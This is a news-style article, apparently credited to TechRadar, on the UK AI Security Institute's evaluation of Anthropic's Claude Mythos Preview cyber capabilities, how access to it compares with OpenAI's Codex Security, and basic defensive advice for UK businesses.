AI cyber models like Mythos represent a genuine inflection point in how attackers and defenders think about automated network compromise. Anthropic announced Claude Mythos Preview on April 7, 2026, and within weeks the UK’s AI Security Institute (AISI) completed evaluations showing something that should concern every security team: frontier AI can now autonomously execute multi-stage attacks on vulnerable enterprise systems. The twist? These same models could strengthen UK defenses—but only if access is tightly controlled and their capabilities are understood.
Key Takeaways
- Mythos Preview can autonomously attack small, weakly defended networks after gaining initial access
- AISI found Mythos performs multi-step cyber attacks that would take human professionals days to execute
- Mozilla confirmed Mythos discovered 271 bugs in Firefox 150, demonstrating legitimate security research value
- Access to Mythos is restricted to a handful of major tech companies like Microsoft, Apple, and Google
- OpenAI’s rival Codex Security offers lower refusal boundaries and scales to thousands of verified defenders via Trusted Access for Cyber program
What AI cyber models can actually do now
Two years ago, the best frontier models could barely complete beginner-level cybersecurity tasks. Today, AI cyber models like Mythos execute complex attack chains that previously required experienced human operators. AISI’s evaluation found Mythos capable of discovering and autonomously exploiting vulnerabilities on small, weakly defended systems where network access has already been established. This is not theoretical—it is a measurable capability gap that has closed in roughly 24 months.
The significance lies in speed and scale. A human security researcher might spend days reverse-engineering malware, discovering zero-days, or mapping lateral movement paths. AI cyber models compress that timeline dramatically. Mozilla’s own validation demonstrates the constructive side: Mythos identified 271 bugs in Firefox 150, catching vulnerabilities that human testers and automated tools had missed. The same architecture that finds critical flaws in widely-used software can also find them in poorly maintained enterprise networks.
The dual-use problem: why control matters
Here is the catch that keeps UK officials awake at night. AI cyber models are not inherently defensive or offensive—they are tools that amplify capability in whatever direction the operator points them. An attacker with network access to a vulnerable system gains a force multiplier. A defender with access to the same model gains a vulnerability scanner that works at machine speed.
The AISI evaluation deliberately tested Mythos on simplified cyber ranges that lacked active defenders, defensive tooling, and alert penalties for triggering security systems. Real enterprise networks have all three. But the fact that AISI had to note this gap suggests the concern is not whether Mythos could attack a well-defended network, but whether the test environment itself was realistic enough to draw firm conclusions. UK ministers have publicly urged businesses to strengthen the basics—patching, access controls, monitoring—precisely because AI cyber models will exploit any weakness they find.
Mythos versus the competition: restricted access versus scaled access
Anthropic has chosen a bottleneck strategy. Mythos access is limited to a handful of major software companies—Microsoft, Apple, Google—meaning the model’s offensive capabilities remain under tight institutional control. OpenAI’s answer is different. Codex Security, positioned as a rival to Mythos, features lower refusal boundaries for cybersecurity tasks and binary reverse engineering for malicious code hunting. More significantly, Codex Security scales through OpenAI’s Trusted Access for Cyber (TAC) program, which extends access to thousands of verified defenders and hundreds of teams.
The strategic tension is obvious. Anthropic restricts access to prevent misuse; OpenAI distributes access to empower defenders. Neither approach eliminates risk. A compromised account at Microsoft is a single point of failure. Thousands of TAC members distributed across enterprises create a larger attack surface but also more eyes and institutional accountability. AISI’s evaluation focused on Mythos, but the institute’s findings apply equally to any frontier AI model with cyber capabilities—including Codex Security.
What UK defenders should do right now
The net-positive framing from UK officials is conditional, not guaranteed. Mythos and similar models become assets only when three conditions hold: restricted access, clear defensive use cases, and honest assessment of what these models can and cannot do. They cannot hack well-defended networks with active monitoring, endpoint detection, and incident response teams. They can and will exploit networks where those defenses are absent or misconfigured.
For UK businesses, the message is blunt. If your enterprise relies on outdated patching practices, weak access controls, or limited monitoring, AI cyber models in the hands of attackers represent an accelerated threat. If you have access to these models through partnerships with major software vendors, you gain a vulnerability discovery engine that works at scale. The difference between risk and benefit is infrastructure maturity, not the model itself.
Will AI cyber models reshape UK cyber defense?
Yes, but not in the way cybersecurity vendors want to sell it. Mythos and Codex Security will not replace human security researchers or mature defensive programs. They will amplify both offensive and defensive capabilities in parallel. The UK’s advantage lies not in restricting AI cyber models—that is impossible and counterproductive—but in ensuring that the organizations with access to them are well-resourced, well-trained, and well-monitored. A frontier model in the hands of a mediocre security team is a liability. The same model in the hands of a mature defender is force multiplication.
Is Mythos available to UK businesses?
Not directly. Mythos access is restricted to a handful of major technology companies like Microsoft, Apple, and Google. UK enterprises can gain access only through partnerships with these vendors or by waiting for Anthropic to expand the program. OpenAI’s Codex Security offers broader access through the Trusted Access for Cyber program, though details on UK-specific enrollment remain limited.
What makes AI cyber models different from traditional security tools?
Traditional security tools follow fixed rules: pattern matching, signature detection, known vulnerability databases. AI cyber models operate autonomously, discovering novel attack paths and zero-day vulnerabilities without explicit instruction. They can chain multiple attack steps together, adapt to obstacles, and learn from each system they encounter. This autonomy is why they are both more valuable for defense and more dangerous if misused.
Should UK businesses fear AI cyber models?
Fear is not productive. Understanding is. AI cyber models are coming, whether through Mythos, Codex Security, or future competitors. The risk is real for organizations with weak fundamentals—poor patching, excessive permissions, limited monitoring. The opportunity is equally real for organizations with mature security infrastructure. UK businesses should focus on the basics: keep systems patched, enforce least-privilege access, maintain comprehensive logging, and build incident response capacity. Do those things well, and AI cyber models become a tool for your defenders to find vulnerabilities before attackers do.
This article was written with AI assistance and editorially reviewed.
Source: TechRadar


